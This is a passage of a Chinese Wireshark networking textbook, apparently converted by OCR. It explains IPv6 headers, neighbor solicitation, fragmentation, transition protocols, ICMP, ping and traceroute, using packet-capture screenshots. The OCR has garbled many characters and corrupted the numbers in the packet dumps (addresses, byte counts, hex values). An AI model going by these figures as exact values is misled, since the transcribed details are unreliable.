载 和 何 长 度 : 衣 明 该 IPv6 包 头 部 后 包含 的 字 节 数 ， 包 侣 扩展 头 部 。 


下 一 包 报 头 : 该 字段 用 来 指明 报头 后 接 的 第 4 层 的 报 文 头 部 的 区 
型 ， 该 部 分 蔡 代 了 IPv4 报 头 中 的 “协议 ”字段 。 


跳 数 限制 :定义 了 一 个 报 文 的 生命 周期 ， 该 字段 蔡 代 了 IPv4 报 头 中 
的 TTL， 每 次 转发 跳 数 减 1， 该 字段 达到 0 时 包 将 会 被 丢弃 。 


源 地 址 : 标识 该 报 文 的 来 源 IP 地 址 。 
目的 地 址 :标识 该 报 文 的 目的 IP 地 址 。 


现在 让 我 们 通过 http_ip4and6.pcapng 来 比较 IPvV4 和 IPv6 报 文 之 间 的 
不 同 。 在 这 个 捕获 文件 里 ， 一 个 Web 服 务 器 在 同一 台 物 理 主机 上 同时 监 
听 IPv4 和 IPv6 链 接 。 一 个 同时 具有 IPv4 和 IPv6 地 址 的 客户 端 分 别 独自 使 
人 两 种 地 址 浏览 服务 堪 并 使 用 curl 心 用 通过 HTTP 下 载 index.php 页 面 〈 见 

7-20) 。 


HN NN 
p NN 
(LA 
UL LT 
NANANAL/ AN 
ET SU 
Ns ed 三 


客户 端 Web 服 务 因 


L272 18:16;140 HTTP GET /index.php La. TOs lo lg 


2001:db8:1:2::1002 HTTP GET /index.php 2001:db8:1:2::1000 


图 7-20 ”相同 物理 主机 使 用 不 同 IP 版 本 的 链接 


当 我 们 打开 这 个 捕获 文件 时 ， 你 应 该 能 够 根据 报 文 列表 中 的 源 和 日 
的 列 很 容易 地 分 辨 出 哪个 数据 包 属 于 哪个 会 话 。 从 1 号 到 10 吉 的 数据 包 
表示 的 是 IPv4 流 (stream 0) ， 从 11 号 到 20 号 的 数据 包 表 示 的 是 IPv6 流 
(stream 1) 。 你 可 以 通过 会 话 窗口 把 这 两 组 流 过 滤 出 来 或 者 在 过 小 条 
内 输入 tcp.stream==0 或 tcp.stream==1。 


我 们 将 在 第 8 章 深 入 了 解 负责 传输 网 页 的 HITP 协 议 。 在 本 例 中 ， 你 
仅 需 明白 高 层 传输 Web 网 页 不 关心 使 用 哪个 展 层 网 络 协议 。 对 于 TCP 道 
理 也 是 一 样 的 ， 它 的 行为 保持 一 致 且 不 受 卫 版 本 影响 。 这 是 数据 封装 的 
一 个 很 好 的 例子 。 虽 然 IPv4 和 IPv6 在 功能 行为 上 有 所 区 别 ， 但 是 其 他 层 
级 的 协议 不 受 影 啊 。 

图 7-21 提 供 了 数据 包 1 写 和 11 写 的 对 比 。 它 们 都 有 着 相同 的 作用 ， 

即 都 是 从 客户 闹 发 往 服 务 端 用 来 初始 会 话 的 TCP SYN 包 。 数 据 报 文 的 以 
太 网 和 TCP 层 基本 一 样 。 然 而 ，IP 层 完全 不 同 。 


Nireshark , Packet 1 . http_ip4andé 





Frame 1: 74 bytes on wire (S592 bits), 74 bytes captured (592 bits) 
Ethernet II, Src: Vmware d3:46:dd (88:8c:29:d3:46:dd), Dst: Vmware 1f:a7:55 (806:8c:29:1f:a7:55) 
Internet Protocol Version 4, Src: 172.16.16.148, Dst: 172.16.16.139 
8188 .... = Version: 4 
--- 818] = Header Length: 29 bytes 
v Differentiated Services Field: 8x88 (DSCP: CS8, ECN: Not-ECT) 
- = Differentiated Services Codepoint: Default (98) 
= Explicit Congestion Notification: Not ECN-Capable Transport (&) 
和 Total Length: 68 
Identification: @xfadf (64223) 
Y Flags: 8x82 (Don't Fraement) 
罗 98... .... = Reserved bit: Not set 
1.. .... = Don't fragment: Set 
0. .... = More fragments: Not set 
Fragment offset: @ 
@ Time to live: 64 
@ Protocol: TCP (6) 
OY Header checksum: @xc6a4 [validation disabled] 
[Good: False] 
[Bad: False] 
Source: 172.16.16.148 
9 Destination: 172.16.16.139 
[Source GeoIP: Unknown] 
[Destination GeoIP: Unknown] 





No.: I ° Time: O000000 ° Source: 172.16.16.140 " Destination: 172,16,16.139... {SYN] Seq=0 Win=29200 Len=0 M59=I1460 SACK PERM=I Toval=417031 Toecr=0 WH 


Close | | Help | 


> Frame 11: 94 bytes on wire (752 bits), 94 bytes captured (752 bits) 
> Ethernet II, Src: Vmware d3:46:dd (80:8c:29:d3:46:dd), Dst: Vmware_1f:a7:55 (88:0c:29:1f:a7:55) 
Y Internet Protocol Version 6, Src: 2001:db8:1:2::1002，Dst: 2881:db8:1;2::;10800 
:6 
Traffic class: Gx88 (DSCP: CS8, ECN: Not-ECT) 
= Differentiated Services Codepoint: Default (8) 
= Explicit Congestion Notification: Not ECN-Capabl.. 
Flowlabel: 8x8868886888 
@ Payload length: 48 
@ Next header: TCP (6) 
© Hop limit: 64 
| 2881:db8:1:2::1882 
Destination: 28861:db8:1:2::1888 
[Source GeoIP: Unknown] 
[Destination GeoIP: Unknown] 


MB 1I ' Time: 4.999280 * Source: 2001:0b8 :21002 * Destination: 2001robe.. [SYN) Seq=0 Win=28800 Len=0 M55=1440 SACH PERM=1 Toval=418281 Toecr=0 WH 


| 











图 7-21 ”实现 相同 职责 的 IPv4 报 文 (上 ) 和 IPv6 报 文 (下 ) 之 间 的 对 比 


。 源 IP 和 目的 IP 的 格式 不 一 样 。 

。 IPV4 的 报 文 总 长 60 字 节 ， 大 小 总 共 74 字 节 ， 包 括 IPv4 报 凑 和 14 字 下 
的 以 太 网 报头 。IPv6 的 报 文 总 共 96 字 节 ， 包 括 一 个 40 字 节 的 IPv6 载 
荷 、 另 一 个 40 字 节 的 IPv6 报 头 和 14 字 节 的 以 太 网 报头 。IPv6 为 了 有 
更 大 的 地 址 空间 而 将 报头 设 为 40 字 节 ， 是 20 字 节 IPv4 报 头 的 2 倍 。 

。 IPV4 通 过 “协议 ?字段 来 确定 下 一 层 的 协议 闫 型 ， 而 IPv6 通 过 “下 一 包 


报头 ?字段 〈 也 可 以 用 来 指明 拓展 报头 ) 。 

e。IPv4 有 TITL 值 ， 而 IPv6 使 用 跳 数 限制 来 实现 相同 功能 。 

。IPv4 包 含 报 头 校 验 和 值 ， 而 IPV6 没 有 。 

。 该 ITPv4 报 文 没 有 被 分 乒 ， 但 是 仍然 包含 设置 这 些 选 项 的 值 。IPv6 不 
会 包含 这 些 信息 ， 因 为 如 有 末 有 需要 会 在 拓展 报头 里 实现 。 


把 IPv4 沉 量 和 IPVv6 流 量 放 到 一 起 比较 古 能 够 切 旱 感受 两 个 协议 运作 
区 列 的 绝 佳 方法 。 


3. 邻 拓 请 求 和 和 ARP 


在 之 前 讨论 不 同类 型 的 流量 时 ， 我 列 出 了 单 播 、 多 播 、 任 播 却 没有 
说 广播 。IPv6 不 文 持 广 播 流 量 ， 因 为 广播 被 认为 是 低 效 的 传输 机 制 。 正 
是 因为 没有 广播 ， 所 以 主机 之 间 互 相 寻 找 的 ARP 协 议 无 法 使 有 用。 那么， 
IPv6 设 备 是 怎么 互相 发 现 的 呢 ? 


答 容 取 雇 于 一 个 叫 作 邻 后 请 求 Cneighbor solicitation ) 的 新 特性 ， 
它 利 用 ICMP6〈 本 章 下 一 节 会 讨论 ) 来 完成 工作 ， 是 邻居 发 现 协 议 
(CNDP) 的 一 项 功能 。 要 完成 这 项 工作 ，ICMP6 使 用 多 播 。 多 播 是 指 把 
信息 同时 传递 给 一 组 目的 地 址 ， 只 有 订阅 了 数据 流 的 主机 才 会 收 到 和 处 
理 数 据 。 多 播 流 量 很 好 辨认 ， 因 为 它们 有 目 己 保留 的 卫 空 间 
(ff00::/8) 。 


尽管 地 址 解析 过 程 依赖 于 一 个 不 同 的 协议 ， 它 依然 使 用 非 彰 简易 的 
请 求 /回复 檬 型 。 例 如 ， 让 我 们 假设 一 种 场景 。 在 这 个 场景 中 一 个 IPv6 地 
址 是 2001:db8:1:2::1003 的 主机 想 要 和 男 一 个 地 址 为 2001:db8:1:2::1000 的 
主机 通信 。 类 似 IPv4， 因 为 在 同一 网 络 下 通信 ， 源 设备 必须 要 知道 目的 
数据 链 路 层 的 MAC 地 址 。 这 个 过 程 如 图 7-22 所 示 。 


在 这 个 过 程 中 ， 主 机 2001:db8:1:2::1003 通 过 多 播发 送 一 个 邻居 请 求 
(ICMPv6 135 类 型 ) 报 文 到 每 一 个 在 网 络 上 的 设备 ， 如 图 7-23 所 示 ， 请 
求 道 : “IP 地 址 是 2001:db8:1:2::1000 的 设备 的 MAC 地 址 是 什么 ? 我 的 
MAC 地 址 是 00:0C:29:2f:80:31。” 


文件 服务 器 
ICMPv6 邻居 请 求 [Type 135) 2001:db8:1:2::1001 
ob:0c:29:1F:22:01 






HN NS 
bp NN 


ICMPv6 邻 居 请 求 (Type 135) 一 一 一 > 二 


-所 一 一 一 一 ICMPv6 邻 居 通 告 (Type 130 一 -一 Si 图 


Web 服 务 族 
2001ldb9:1:2..1003 ~ 2001:db8:1:2::1000 
0o.0c.29.2f.80.31 ICNMPv6 邻 居 请 求 [Type 133) 00:0c:29;:TF:a7:355 


邮件 服务 器 
20O0OTaES clOO2 
00:0c:29:fe:ea:1e 


图 7-22 ”使 用 邻 大 请 求 来 地 址 解析 


拥有 这 个 卫 地 址 的 设备 会 收 到 这 个 消息 ， 并 使 用 邻 后 通告 
(ICMPv6 136 类 型 ) 回复 源 主 机 ， 回 复 道 :“ 嗨 ! 我 的 网 络 地 址 是 
2001:db8:1:2::1000， 并 日 我 的 MAC 地 址 是 00:0c:29:1f:a7:55。” 一 旦 这 条 
消 奶 们 对 方 接收 到 ， 那 么 通信 就 可 以 开始 了 了。 


你 可 以 在 捕获 文件 icmpv6_neighbor_solicitation.pcapng 里 看 到 这 个 过 
程 。 捕 获 的 流量 中 包含 我 们 讨论 的 这 个 例子 : 2001:db8:1:2::1003 想 要 与 
2001:db8:1:2::1000 通 信 。 我 们 查看 第 一 个 包 并 在 数据 包 细 节 窗 口 展开 
ICMPv6 部 分 。 我 们 可 以 看 到 这 是 ICMP 135 类 型 的 包 ， 并 且 由 
2001:db8:1:2::1003 发 往 多 播 地 址 ff02::1:ff00:1000。 源 主机 提供 了 想 要 进 
行 通 信 的 目标 IJPv6 地 址 ， 并 跟随 着 自己 第 二 层 的 MAC 地 址 。 


对 该 邻 大 请 求 的 回复 可 以 在 这 个 捕获 文件 的 第 二 个 数据 包 中 找到 。 
在 数据 包 细 节 窗 口 展开 ICMPv6 部 分 〈 见 图 7-24) ， 显 示 这 是 ICMP 136 
类 型 的 包 ， 由 2001:db8:1:2::1000 回 复 至 2001:db8:1:2::1003， 并 且 包 含 着 
2001:db8:1:2::1000 的 MAC 地 址 00:0c:29:1f:a7:55。 


是 Wireshark , packet 1.icmpv6_neighbor solicitation 





> Frame 1: 86 bytes on wire (688 bits), 86 bytes captured (688 bits) 

> Ethernet II, Src: Vmware 2f:80:31 (88:8c:29:2f:860:31), Dst: IPvemcast ff:90:10:98 (33:33:ff:80:18:0806) 

Y Internet Protocol Version 6, Src: 2881:db8:1:2::;18803, Dst: fi162::1:f168:1000 

= Version: 6 

= Traffic class: 8x88 (DSCP: CS8, ECN: Not-ECT) 

= Flowlabel: Gx88888880 
I length: 32 
Next header: ICMPv6 (58) 

Hop limit: 255 

0 Source: 2801:db8:1:2::1083 
Destination: ffe2::1:ff90:1069 
[Source GeoIP:; Unknown] 
[Destination GeoIP: Unknown] 

Y Internet Control] Message Protocol v6 
Type: Neighbor Solicitation (135) @ 
Code: 9 
Checksum; @x44b7 [correct] 

Reserved: 88888880 
Target Address: 2801:db8:1:2::1809 从 
Y ICMPv6 Option (Source link-layer address : 88:0c:29:2f:80:31) 
Type: Source link-layer address (1) 
Length: 1 (8 bytes) 
Link-layer address: Vmware 2f:80:31 (00:0c:29:2f:80:31) @ 








No.: 1 * Time: D. O00000 " Source: 2001 "dbB: 12::TO03 - Destinatiom: FU2::IHO0:IO00 * Pro._ v6 * Lengih: B65 " Info: Newhbor Sofcitston for 2001:cbB:1:2:: T1000 frorm DO:De:29:2580:3 


re 吓 本 

















图 7-23 ” 邻 拓 请 求 报 文 


是 Wireshark . Packet2.icmpv6_n elghbor_solicitation 


Frame 2: 86 bytes on wire (688 bits), 86 bytes captured {688 bits) 
Ethernet II, Src: Vmware 1f:a7:55 (88:0c:29:1f:a7:55), Dst: Vmware 2f:80:31 (80:08c:29:2f:808:31) 
Internet Protocol Version 6, Src: 2801:db8:1:2::16880, Dst: 26601:db8:1:2::1803 
= Version: 6 
ee 5 。= Traffic class: 8@x88 (DSCP: CS8, ECN: Not-ECT) 
-..» G008 89986868 8888 8808 8888 Flowlabel: 8x88888888 
py onl Ja 32 
Next header: ICMPv6 (58) 
Hop limit: 255 
Source; 28081:;db8:1;2;:;1880 
0 Destination: 2881:db8:1:2::1883 
[Source GeoIP:; Unknown] 
[Destination GeoIP: Unknown] 
Internet Control Message Protocol v6 
Type: Neighbor Advertisement (136) 和 
Code: 8 
Checksum: @x8beb [correct] 
vw Flags: 8x68880880 
Dias sss eave ove Tee eu Weae Router: Not set 
1 Solicited: Set 
， Override: Set 
.有 DBBB G008 808808808 8888 Bob 8888 8880 Reserved: 9 
Target Address: 28681:;db8:1:2::;1880 
Y ICMPv6 Option (Target link-layer address : 99:9c:29:1f:a7:55) 
Type: Target link-layer address (2) 
Length: 1 (8 bytes) 
Link-layer address: Vmware_ 1f:a7:55 (88:8c:29:1f:a7:55) © 





No.” 2 * Time: .O002867 * Source: 2001:db8:1:2::1000 - Destination: 200i:db8:1:2:-10.* Into: Neighbor Adyertisement 2001:0b8:1:2::1000 (sol ee 








图 7-24 一 个 邻 牛 通告 报 文 


一 旦 这 个 过 程 完 成 ，2001:db8:1:2::1003 和 2001: db8: 1:2::1000 就 开始 
正常 ICMP6 会 话 了 。 你 可 以 看 到 echo 请 求 和 echo 回 复 流 量 ， 这 意味 着 邻 
居 请 求 和 数据 链 路 层 的 地 址 解析 成 功 了 。 


4. ITPv6 分 乒 


IPv4 报 头 内 置 分 片 文 持 ， 因 为 协议 要 确认 报 文 能 够 穿 过 于 有 MTU 值 
不 同 的 网 络 。 在 IPv6 里 ， 很 少 用 到 分 厂 ， 所 以 这 一 选项 没有 包含 在 IPV6 
报头 里 。 一 个 传输 IPv6 报 文 的 设备 在 发 送 之 前 会 执行 一 个 叫 作 MTU 探 索 
的 过 程 ， 访 过程 会 决定 报 文 的 最 大 容量 。 一 旦 路 由 占 收 到 了 比 下 一 层 网 
络 MTU 还 大 的 报 文 ， 路 由 占 束 会 于 挥 那 个 包 ， 并 有 昌 返 回 一 个 “ 报 文 太 
大 ”的 ICMPVv6 消 息 给 源 主机 。 如 果 上 一 层 协 议 支持 ， 则 源 主机 收 到 消息 
百 ， 会 答 试 对 报 文 进行 分 片 ， 然 后 重新 发 送 。 这 个 过 程 会 一 直 重 复 ， 直 
到 达到 足够 小 的 MTU 或 者 载 谷 不 能 够 再 被 分 片 下 去 〈 见 图 7-25) 。 路 由 
合 是 永远 不 会 负责 对 报 文 进行 分 片 的 。 源 设备 负责 选择 一 个 在 传输 路 径 
中 合适 的 MTU 值 ， 并 对 报 文 进行 适当 分 片 。 





客户 端 路 由 器 路 由 天 Web 服 务 器 
MTU 1500 MTIU 1500 MTU 1400 MTU 1500 





1500 字 书 MTU 的 报 文 一 一 一 一 





-中 一 ICMPv6 报 文 过 大 类 型 2) 
有 着 MTU 值 1400 的 





图 7-25”IPv6 MTU 路 径 探索 


如 采 IPv6 上 层 协 议 不 能 限制 载 谷 的 大 小 ， 那 么 瓯 必须 使 用 分 请。 要 
实现 分 片 功能 ， 会 在 IPv6 报 文 上 添加 一 个 分 片 拓 展 报头 。 你 会 
企 ipv6_fragments.pcapng 捕 获 文 件 中 找到 IPv6 分 厂 的 样 例 流量 。 


正 因为 接收 端 设 备 比 及 送 端 设 备 的 MTU 信 小 ， 所 以 在 捕获 文件 里 
分 列 有 两 个 彼 分 片 的 报 文 ， 来 表示 每 一 个 ICMP6 echo 请 求 和 回复 。 第 一 
个 数据 包 中 的 分 所 报头 如 图 7-26 所 示 。 


8 字 闻 的 拓展 报 尖 包含 了 和 IPv4 中 分 片 一 样 的 属性 ， 例 如 分 片 偏 
移 、 更 多 分 片 标志 、 标 志 字 段 等 。IPv6 只 会 在 需要 分 片 的 时 候 在 报 文 后 
面 加 上 这 些 ， 而 不 是 加 到 每 个 报 文中 。 这 种 机 制 更 有 效率 ， 它 允许 接收 
系统 午 组 分 厂 。 此 外 ， 如 朵 有 拓展 报 涉 ， 那 么 “下 一 个 报 文 ” 域 将 会 指 问 
拓展 报 兴 ， 而 个 十 它 要 封 竣 的 下 一 层 协 议 。 


帮 Wireshark , Packet 1 ,ipv6 fragments 








e 1: 1516 bytes on wire (12686 bits)，1516 bytes captured (12686 bits) 
四 net II, Src: Vmwar a 80:31 (60:0c:29:2f:80:31), Dst: Apple cb:b2:56 (78:31:cl:cb:b2:56) 
rsio src: 20991:db8:1:2::1993，Dst: 2861:db8:1:2;:19909 


. = Traffic class: Ox80 (DSCP: C58@, ECN: No ECT) 
. = Differentiated Services Codepoint: Default (8 
xplicit Congestion Notification: Not ee capable Transport (8) 
DDDD DDDD 80008 F880 DDD8 = ep xDDDpDBDDD 
Payload len ee oa 
Next header: Fragme eader for IPv6 (44) 各 
Hop limit: 64 
: 28601:db8:1:2::188 
Destination; 28001:db8:;1:2::1888 
nown ] 


Ee er 
Next ee ri ICMPVv6 (58) 
Reserve ctet: Ox0000 


0666 6666 68000 0... = Offset: 9 (9 bytes) © 
和 = Reserve cn- 十 


a Sr Pes cep 
Identification: @xcde 
Reassembled IPv6 in frame: 2 
Data (1448 bytes) 














No,s 1 * Time; O000000 * Source: 2001:Gb8:1;2:1003 - Destination; 2001:0b8:1:2::1000 - Dipcoy IPYE * Lengehs 1510 * Inios IPYE fragment (of=0 more=Y icent= (WoeO0817 rt=58) 





图 7-26 “一 个 IPv6 分 片 报头 拓展 


5. IPVv6 转 换 协 议 


IPv6 指 出 了 一 个 非常 现实 的 问题 ， 但 转换 现 有 网 络 架 构 所 需 的 代价 
导致 其 普及 非 负 缓 怪 。 要 侧 化 这 种 欧 换 ， 融 需要 一 些 协议 让 IPv6 会 话 可 
以 在 仪 支 持 IPv4 的 网 络 中 通过 隧道 传输 。 在 此 ， 隧 道 意 味 看 IPV6 会 Se 
车 交 芝 在 IPV4 会 话 当中 的 ， 吏 像 其 他 可 以 被 IPv4 封 痛 的 协议 一 样 。 封 疼 
种 通过 以 下 3 种 方 却 。 


路 由 器 到 路 由 器 : 使 用 一 个 隧道 来 封装 IPv6 流 量 ， 使 得 来 自 一 边 网 
络 的 收发 主机 可 以 访问 另 一 边 的 IPv4 网 络 。 这 种 方法 可 以 让 整个 网 络 使 
用 IPvV6， 网 络 内 部 有 IPvV4 连 接 节 所。 


主机 到 路 由 右 : 在 跤 由 层 封 装 用 来 传输 从 IPV6 主 机 穿 过 IPv4 网 络 的 
Ee 这 种 方法 允许 在 IPv4 网 络 里 单一 文 持 IPv6 的 主机 访问 外 部 IPv6 网 


主机 到 主机 : 在 两 个 病 ， Ta 到 IPv6 流 量 。 这 个 方法 允许 两 个 
IPv6 痪 点 直接 罕 过 IPv4 网 络 通 


虽然 本 书 不 会 深入 探讨 转换 协议 ， 但 了 解 到 它们 的 存在 ， 对 你 在 数 
据 包 层面 分 析 问 题 是 有 帮助 的 。 这 样 ， 在 你 需要 时 也 可 以 目 己 去 俘 找 相 


天 资料 。 下 面 列 举 了 几 个 利 见 的 协议 。 


6to4: 也 叫 IPv6 over IPv4， 这 是 一 个 可 以 让 IPv6 的 包 在 IPv4 网 络 中 
we 的 协议 。 访 协议 给 中 继 站 或 路 由 需 提 供 路 由 需 到 路 由 器 、 主 机 到 路 
由 需 、 主 机 到 主机 的 文 持 。 


Teredo; 当 在 IPv4 网 络 中 使 用 NAT 《网 络 地 址 翻译 ) 时 ， 这 个 协议 
提供 IPv6 单 播 通信 服务 。 该 协议 把 IPv6 报 文 封 装 到 UDP 传输 协议 里 ， 最 
后 通过 IPv4 发 出 去 。 


ISATAP: 这 个 本 地 协议 允许 在 同一 网 络 下 的 仅 文 持 IPv4 或 IPv6 的 
主机 和 主机 之 间 的 通信 。 


7.3 ”互联 网 控制 消 居 协议 


互联 网 控制 消息 协议 〈Internet Control Message Protocol, ICMP) 是 
TCP/IP 协 议 族 中 的 一 个 功能 协议 ， 负 员 提 供 在 TCP/IP 网 络 上 的 设备 、 服 
务 以 及 路 由 器 可 用 性 的 信息 。 大 多 数 网 络 检修 拉 巧 和 工具 者 是 基于 律 用 
的 ICMP 消 息 类 型 。ICMP 在 RFC792 中 定义 。 


7.3.1 ICMP 头 


ICMP 是 卫 的 一 部 分 并 依赖 IP 来 传递 消息 。ICMP 头 相对 较 小 并 根 握 
用 途 而 改变 。 如 图 7-27 所 示 ，ICMP 头 包含 了 以 下 几 个 字段 。 


互联 网 控制 消息 协议 (ICMP) 


EE dl kt 


ass oz 
一 





图 7-27 ICMP 头 


类 型 (Type) : ICMP 消 息 基 于 REFC 规 范 的 类 型 或 分 类 。 


2? 
嵌 


代码 (Code) : ICMP 消 息 基 于 REFC 规 范 的 子 3 


校 验 和 (Checksum ) : 用 来 保证 ICMP 头 和 数据 在 抵达 有 目的 地 时 的 


完整 性 。 


可 变 域 (Variable) : 依赖 于 类 型 和 代码 域 的 部 分 。 
7.3.2 ”ICMP 类 型 和 消息 


正如 刚才 所 说 ，ICMP 数 据 包 的 结构 取决 于 由 Type 和 Code 域 中 的 值 
所 定义 的 用 途 。 


你 可 以 将 ICMP 的 类 型 域 作为 数据 包 的 分 类 ， 而 Code 域 作为 它 的 于 
类 。 举 例 来 说 ，Type 域 的 值 为 3 时 意味 看 “目标 不 可 达 ”。 但 只 有 这 个 信 
姑 可 能 不 足以 有 友 现 问题 ， 当 数据 包 在 Code 域 中 指明 值 为 3， 也 就 是 “六 口 
不 可 这 ?时 ， 你 融 可 以 知 直 这 应 该 是 你 试图 进行 通信 的 奖 口 的 问题 。 


7.3.3 Echo 请 求 与 啊 应 


ICMP 因 为 ping 工 具 而 广为人知 。ping 用 来 检测 一 个 设备 的 可 连接 
性 。 大 多 数 信息 技术 专家 都 对 ping 很 熟悉 。 


在 命令 行 中 输入 ping <ip 地 址 >， 其 中 将 <ip 地 址 > 蔡 换 为 网 络 上 的 一 
个 实际 JP 地址 ， 束 可 以 使 用 ping 了 。 如 有 果 目 标 设备 在 线 ， 你 的 计算 机 有 
到 过 目标 的 通路 ， 并 且 没 有 防火 场 隔离 通信 的 话 ， 你 将 能 够 看 到 你 的 
ping 命 令 的 啊 应 。 


在 图 7-28 中 的 例子 中 ， 给 出 了 4 个 成 功 显 示 了 大 小 、RTT 和 TTL 的 啊 
应 。Windows 还 会 提供 一 个 总 结 信息 ， 告 诉 你 有 多 少数 据 包 被 友 送 、 接 
收 或 者 丢失 。 如 果 通 信和 失败 ， 会 有 一 条 信息 告诉 你 原因 。 


Pinging 172.16.16.1 With 32 bytes of data: 
Reply from 172.16.16.1: bytes=32 time=2ms TTL 
RSPLw 二 工 了 卫 


sply from 172.165.16.1: bytes—-32 time-1ms 二 
Reply from 172.16.16.1: bytes=32 time=2ms TTL= 
Reply from 172.16.16.1: bytes=32 time=2ms TTL= 
Ping statistics for 172.16.16.1: 

packets: Sent = 4, Received = 4, LOS 本 
Mpproximate round trip times in milli-seconds: 
Minimum = 1m5, Maximum = 2mSs 上 





图 7-28 ”使 用 ping 命 令 测 试 可 连接 性 


基本 上 来 说 ，ping 命 令 每 次 向 一 个 设备 发 送 一 个 数据 包 ， 并 等 待 回 
复 ， 以 确定 是 否 存在 连接 ， 如 图 7-29 所 示 。 


图 7-29 ping 命 令 只 包含 两 步 








里 然 ping 对 于 开业 必 不 可 少 ， 但 当 部 闭 了 基于 主机 的 防火 墙 时 ， 它 的 结 琳 束 可 能 上 其 有 其 
骗 性 了 。 现 在 的 很 多 防火 墙 都 限制 了 设备 去 啊 应 ICMP 数 据 包 。 这 样 对 于 安全 性 是 有 帮助 
的 ， 因 为 潜在 的 攻击 者 可 能 会 在 使 用 ping 来 判断 主机 是 否 可 达 时 ， 放 茎 进一步 的 行动 。 但 这 
样 故障 排除 也 变 得 困难 了 起 来 一 一 当知 道 你 可 以 和 一 合 设备 通信 时 ， 使 用 ping 检 测 连接 却 收 
不 到 任何 啊 应 会 让 你 很 抓 狂 。 





ping 功 能 在 实际 中 是 简单 ICMP 通 信 的 一 个 很 好 的 例子 。 文 件 
icmp_echo.pcap 中 的 数据 包 会 告诉 你 在 运行 ping 时 都 发 生 了 什么 。 


第 一 个 数据 包 ( 见 图 7-30) 显示 主机 192.168.100.138 在 给 
192.168.100.1 发 送 数据 包 。 当 你 展开 这 个 数据 包 的 ICMP 区 段 时 ， 可 通过 
得 看 类 型 和 代码 域 ， 判 断 ICMP 数 据 包 的 类 型 。 在 这 个 例子 中 ， 数 据 包 
的 类 型 是 8， 人 代码 是 0， 意 味 着 这 是 一 个 echo 请 求 《Wireshark 会 告诉 你 所 
显示 的 类 型 / 代 但 究竟 是 什么 意思 ) 。 这 个 echo (ping) 请 求 是 整个 过 程 
的 前 一 半 。 这 是 一 个 简单 的 ICMP 数 据 包 ， 它 使 用 了 P 有 发 送 ， 包 含 了 很 少 
的 数据 。 除 了 指定 次 型 、 代 但 以 及 校 验 和 ， 我 们 还 会 有 一 个 序列 号 用 来 
匹配 请 求 和 响应 ， 另 外 ， 在 ICMP 数 据 包 可 变 域 还 有 一 串 随 机 文本 字 


Ar 


付 。 


BB 


echo 和 ping 经 常会 被 混用 ， 但 记 住 ，ping 实 际 上 是 一 个 工具 的 名 字 。ping 工 具 用 来 发 送 
ICMP 的 echo 请 求 数据 包 。 








这 个 序列 的 第 二 个 数据 包 是 对 我 们 请 求 的 啊 应 〈 见 图 7-31) 。 
数据 包 的 ICMP 区 段 闫 型 是 0(， 代 码 是 0， 雪 示 这 是 一 个 echo 啊 应 。 由 于 
第 二 个 数据 包 的 序列 号 与 第 一 个 相 匹 配 ， 因 此 我 们 可 以 知道 这 个 echo 响 
应 包 对 应 看 之 前 的 那个 echo 请 求 数据 包 。 这 个 啊 应 数据 包 中 有 着 和 初始 
请 求 中 传输 的 32 位 字符 串 一 样 的 内 容 。 在 第 二 个 数据 包 补 
192.168.100.138 成 功 接收 到 之 后 ，ping 就 会 报告 成 功 。 


上 Wireshark .Packet 1 .icmp_echo 





> Frame 1: 74 bytes on wire (592 bits)，74 bytes captured (592 bits) 
> Ethernet II, Src: CompalCco b8:59:bi (86:16:d4:b8:59:b1), Dst: CiscoInc 4b:ce:7f (80:12:88:4b:c@:7Tf) 
> Internet Protocol Version 4, Src: 192.168.188.138, Dst: 192.168.160.1 OO 
Y Internet Control Message Protocol 
@ Type: 8 (Echo (ping) request) 
@ code: 6 
Checksum: @xl45c [correct] 
Identifier (BE): 1289 (8x8588) 
Identifier (LE): 5 (0x8885) 
e number (BE): 13312 (8x3488) 
equence number (LE): 52 (8x8834) 
[Response frame: 2] 
Y Data (32 bytes) 
Data: 6162636465666768696a6b6c6d6e6f767172737475767761. . 。 


[Length: 32] 





图 7-30”ICMP echo 请 求 数据 包 


量 Wireshark , Packet 2 .icmp_echo 


》 Frame 2: 74 bytes on wire (592 bits), 74 bytes captured (592 bits) 
> Ethernet II, Src: CiscoInc A4b:c8:7f (88:12:86:4b:c8:7f), Dst: CompalCo b8:59:b1 (88:16:d4:b8:59:b1) 
> Internet Protocol Version 4, Src: 192.168.188.1, Dst: 192.168.180.138 
v Internet Control Message Protocol 
oO Type: 8 (Echo (ping) reply) 
LD] Code: 8 
Checksum: 9x1c5c [correct] 
Identifier (BE): 1288 (8x8588) 
Identifier (LE): 5 (Gx8885) 
Sequence number (BE): 13312 (8x3488) 
Sequence number (LE): 52 (8x8834) 
Request frame: 1 
[Response time: 8.776 ms] 
Y Data (32 bytes) 
@ Data: 6162636465666768696a6b6c6d6e6f787172737475767761... 
[Length: 32] 


Neo, 2 * Time: 0.000776 * Sourcer 192,168,100,1 * Destination: 192,168, 100,138 * Protoeol... ' Length: 74 * Intor Echo {ping, reply id=005 0, seq= 13312/52, t=295 (reqwest in 1) 


[cee || ree | 





图 7-31 ”ICMP echo 回 复数 据 包 


你 还 可 以 使 用 ping 的 选项 来 增加 它 的 数据 填 元 ， 这 样 在 检测 不 同类 
型 的 网 络 时 ， 就 可 以 强制 将 数据 包 分 厂 。 这 在 检测 具有 较 小 分 厂 大 小 的 
网 络 时 会 用 到 。 








7.3.4 ”路由 跟踪 


路 由 跟踪 功能 用 来 识别 一 个 设备 到 万 一 个 设备 的 通路 。 在 一 个 简单 
的 网 络 上 ， 这 个 通路 可 能 只 经 过 一 个 路 由 右 ， 长 全 一 个 都 不 经 过 。 但 在 
复 琳 的 网 络 中 ， 数 据 包 可 能 要 经 过 数 十 个 路 由 带 才 会 到 达 最 终 目 的 地 。 
确定 数据 包 从 一 个 目的 地 到 为 一 个 目的 地 的 实际 路 笃 ， 对 于 退 信 检修 十 


分 重要 。 


通过 使 用 ICMP 在 IP 协 议 的 帮助 下 ) ， 路 由 跟踪 可 以 画 出 数据 包 
的 路 径 。 举 例 来 说 ， 文 件 icmp_traceroute.pcap 中 的 第 一 个 数据 包 ， 和 我 
们 在 上 一 节 中 看 到 的 echo 请 求 ( 见 图 7-32) 很 类 似 。 


| Wireshark . Packet 1 .cmp_traceroute 


> Frame 1: 186 bytes on wire (848 bits), 186 bytes captured (848 bits) 
> Ethernet II, Src: CompalCo b8:59:b1 (88:16:d4:b8:59:b1), Dst: CiscoInc 4b:c8:7f (86:12:868:4b:c8:7f) 
YY Internet Protocol Version 4, Src: 192.168.109.138，Dst: 4.2.2.1 人 0 
8188 .... = Version: 4 
--- 8181 = Header Length: 28 b 
